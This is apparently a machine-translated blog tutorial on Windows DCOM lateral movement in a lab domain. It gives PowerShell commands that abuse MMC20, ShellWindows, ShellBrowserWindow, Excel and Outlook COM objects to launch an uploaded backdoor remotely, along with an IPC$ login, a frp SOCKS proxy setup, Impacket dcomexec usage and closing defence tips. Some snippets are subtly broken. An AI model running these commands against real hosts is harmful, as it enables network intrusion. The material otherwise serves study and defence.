** Welcome to my WeChat official account. 《 The soul in the shell 》**

COM

COM Component object model (Component Object Model,COM) , Is based on Windows A set of component object interface standards for the platform , It consists of a set of construction specifications and component object libraries .COM Many Microsoft products and technologies , Such as Windows Media player and Windows Server The basis of .

General objects are composed of data members and methods acting on them , Although component objects are similar to general objects , But there is a big difference . Component objects do not use methods, but interfaces to describe themselves . The interface is defined as “ A set of semantically related functions implemented on objects ”, Its essence is a set of function pointer tables , Each pointer must be initialized to a specific function body , There is no limit to the number of interfaces implemented by a component object .

DCOM Use in remote systems

DCOM（ Distributed Component Object Model ） Is a series of Microsoft concepts and program interfaces . It supports communication between components on two different machines , Whether they are running on a LAN 、 Wide area network 、 still Internet On . Use this interface , The client program object can send requests to the server program object on another computer in the network

COM It provides a set of interfaces that allow communication between clients and servers on the same computer ( Running on the Windows95 And later versions of the operating system ).DCOM yes COM（ Component object model ） An extension of , It allows applications to instantiate and access remote computers COM Properties and methods of objects .DCOM Using remote procedure calls （RPC） Technology will component object model （COM） The functionality of the extends beyond the local computer , therefore , Hosting on a remote system COM Server side software （ Usually in DLL or exe in ） Can pass RPC Expose its methods to the client

When an attacker moves sideways , If you want to execute a command or... On a remote system Payload, In addition to being able to use at、schtasks、Psexec、WMI、smbexec、Powershell、 adopt Office Applications and others that contain unsafe methods Windows Object to execute commands remotely , It also uses a large number of devices deployed in the network environment, such as IPS、 Flow analysis and other systems . Learn more about lateral movement methods , It is of great benefit to the daily system security maintenance .

Use DCOM One of the advantages of lateral movement is , The processes executed on the remote host will be managed COM Server side software . For example, we abuse ShellBrowserWindowCOM object , Then it will be in the existing remote host explorer.exe In process execution . For the attacker , This will undoubtedly enhance concealment , Because there are a lot of programs that are going to DCOM Open methods , Therefore, it may be difficult for the defender to fully monitor the implementation of all procedures

Via local DCOM Carry out orders

1、 obtain DCOM list

There are two orders , One of the commands is that only psh3.0, namely windows server 2012 above

Get-CimInstance Win32_DCOMApplication
Get-CimInstance -classWin32_DCOMApplication | select appid,name 

Another command supports psh2.0

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication 

win7 Next

win server 2012

In fact, many of them are obtained online DCOM list , Then use some MMC20 Etc , Think about it , In fact, query DCOM This step is really useless , I guess , Inquire about DCOM The purpose of the list is to find the right DCOM Components , Then query whether it has command execution or some other functions , But I can't pass DCOM Query to CLSID Or is it ProgID, So I can't judge DCOM What functions can be performed

2、 Use DCOM Execute arbitrary orders

First of all, you need an administrator shell

What happens is , No administrator rights

$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","127.0.0.1")) 

This command is to get a COM Instance of object , If successful , You can use the command to view usage

$com.Document.ActiveView | Get-Member 

You can see the execution of a command

$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimzed") 

If executed successfully , Will open the calculator （calc.exe), If you replace the program with another malicious payload Can cause an attack

win7:

win10:

except MMC20.Application, also ShellWindows、ShellBrowserWindow、Excel.Application as well as Outlook.Application And so on can be used by us .

We go through MMC20.Application Of ExecuteShellCommand Method runs a locally “ Calculator ” Program . If we provide a remote host IP, You can use

[activator]::CreateInstance([type]::GetTypeFromProgID(ProgID,IP)) [Activator]::CreateInstance([Type]::GetTypeFromCLSID(CLSID,IP)) 

Command to pass Powershell With the remote DCOM Interact , Just provide DCOM ProgID With each other's IP Address , Will provide the other party with the DCOM Instance of object , And then you can use this DCOM Applications and ExecuteShellCommand Method to execute commands on the target host . If the attacker puts “ Calculator ” Change the program to malicious payload, It will pose a threat to the system security .

Use DCOM Execute command on remote host

Premise ：

1. The system firewall needs to be turned off

2. You must have administrator privileges

Test environment ：

attack

kali:192.168.200.4

Intradomain environment

win7:10.10.10.17、192.168.200.22

windows server:10.10.10.12

1、 control win7

Hypothetical control win7 As a springboard , take shell Bounce back to msf

load powershell expand , For use powershell command

2、 adopt ipc$ Link remote host

If you want to pass IPC Upload files to the target machine , Then you need to establish a connection with a user with administrator privileges

net use \\10.10.10.12 "Gh0st1nTheShell" /user:g1ts.com\testuser 

3、 Upload the back door to the target host

Use copy command

copy [file path] [target path] 

4、 Carry out orders

(1) call MMC20.Application Remote execution command

$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.12")) $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c C:\hhh.exe","Minimized") 

You can see that success returns a new shell

(2) call 9BA05972-F6A8-11CF-A442-00A0C90A8F39

$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"10.10.10.12")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.item()
$item.Document.Application.ShellExecute("cmd.exe", "/c c:\hhh.exe","c:\windows\system32",$null, 0)

The second command can also

Both of the above methods are applicable to Windows 7~Windows 10、Windows Server 2008~Windows Server 2016 The system of .

And whether or not established in advance ipc The command can be executed successfully , You don't need the credentials of the other host , You only need the administrator permission of the current host .

call Excel.Application Remote execution command

#  adopt PowerShell And DCOM Remote interaction , establish Excel.Application Instance of object :
$com = [activator]::CreateInstance([type]::GetTypeFromprogID("Excel.Application","10.10.10.12"))
$com.DisplayAlerts = $false
#  Then execute the following command , We can call the object's "DDEInitiate" Method to start a process on a remote host :
$com.DDEInitiate("cmd.exe","/c C:\hhh.exe")

But I failed to run

call ShellBrowserWindow Remote execution command

Apply to Windows 10 and Windows Server 2012 R2 And other versions of the system

#  adopt PowerShell And DCOM Remote interaction , establish Excel.Application Instance of object :
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","10.10.10.12"))
#  Then execute the following command , We can call the object's "shellExecute" Method to start a process on a remote host :
$com.Document.Application.shellExecute("C:\hhh.exe")

Successful launch

call Visio.Application Remote execution command

Applicable conditions ： The target host has Visio

#  adopt PowerShell And DCOM Remote interaction , establish Visio.Application Instance of object :
$com =[activator]::CreateInstance([type]::GetTypeFromProgID("Visio.Application",“10.10.10.12"))
#  Then execute the following command , We can call the object's "shellExecute" Method to start a process on a remote host :
$com.[0].Document.Application.shellExecute("c:\hhh.exe")

call Outlook.Application Remote execution command

Applicable conditions ： The target host has Outlook.

adopt Outlook establish Shell.Application Object to implement command line execution

#  adopt PowerShell And DCOM Remote interaction , establish Visio.Application Instance of object :
$com =[activator]::CreateInstance([type]::GetTypeFromProgID("Outlook.Application","10.10.10.12"))
#  Then execute the following command , adopt Outlook establish Shell.Application Object and execute the command :
$com.createObject("Shell.Application").shellExecute("C:\hhh.exe")

Impacket -- dcomexec.py

First create socks5 agent , Use frp

frpc and frps The contents are as follows , among ,frps The address is 192.168.200.4

frps：
[common]
bind_port = 7000
frpc：
[common]
server_addr = 192.168.200.4
server_port = 7000

[plugin_socks5]
type = tcp
remote_port = 6000
plugin = socks5

Then configure proxychains, First in /etc/proxychains4.conf Configure the agent at the end of the

Then type before executing the command proxychains

python3 ./dcomexec.py [domain/]username:[email protected]  // Create an interactive shell
python3 ./dcomexec.py [domain/]username:[email protected] command   // Carry out orders 

If there is no clear text password , You can also use hash instead of

python3 ./dcomexec.py [domain/]username:@ip -hashes [hash] 

Be careful

1、 The entered user information is based on the currently logged in user , For example, I am now logging in administrator, If the user information I enter is testuser, Even if it passes the verification, it cannot execute the command or return shell

2、 The logged in user needs to be an administrator , If you are a common domain user , Login without permission , Be rejected

More ways

https://www.anquanke.com/post/id/215960

How to use derived functions and exposed DCOM Interface to achieve horizontal penetration - Safe guest , Security information platform (anquanke.com)

You don't have to execute a command to move laterally , There are some ways to achieve the same effect , The attacker's creativity is needed

Defense advice

manufacturer

1、 Make sure that when you uninstall the utility , Delete legacy DCOM Registry entries ;

2、 Do not create in the registry a file that points to a binary file that does not exist DCOM The program path .

Network defender

1、 On the whole , The defender should read carefully @enigma0x3 as well as @PhilipTsukerman Suggestions given in the blog , Capture relevant information pertinently IOC;

2、 Want to use these DCOM Method （ Usually ） Requires privileged access from the remote host . Please protect the domain account with advanced permissions , Avoid reusing password credentials for local host accounts ;

3、 Please ensure that the defense in depth control strategy is deployed 、 Host based security products and monitor hosts , To detect / Block can be active . Enabling host based firewalls can prevent RPC/DCOM Interaction and instantiation operations ;

4、 Monitoring file systems （ And the registry ）, Focus on new elements and changes ;

5、 Monitor suspicious in the environment PowerShell operation . If possible , Please force enable PowerShell Of “Constrained Language Mode（ Constraint language pattern ）”（ This may be difficult for privileged accounts ）;

6、 stay DCOM call “ Failure ” when , On the target host System The log will generate ID by 10010 Events （Error, DistributedCOM）, It includes CLSID Information .

Reference article ： How to use it DCOM Achieve horizontal penetration - FreeBuf Network security industry portal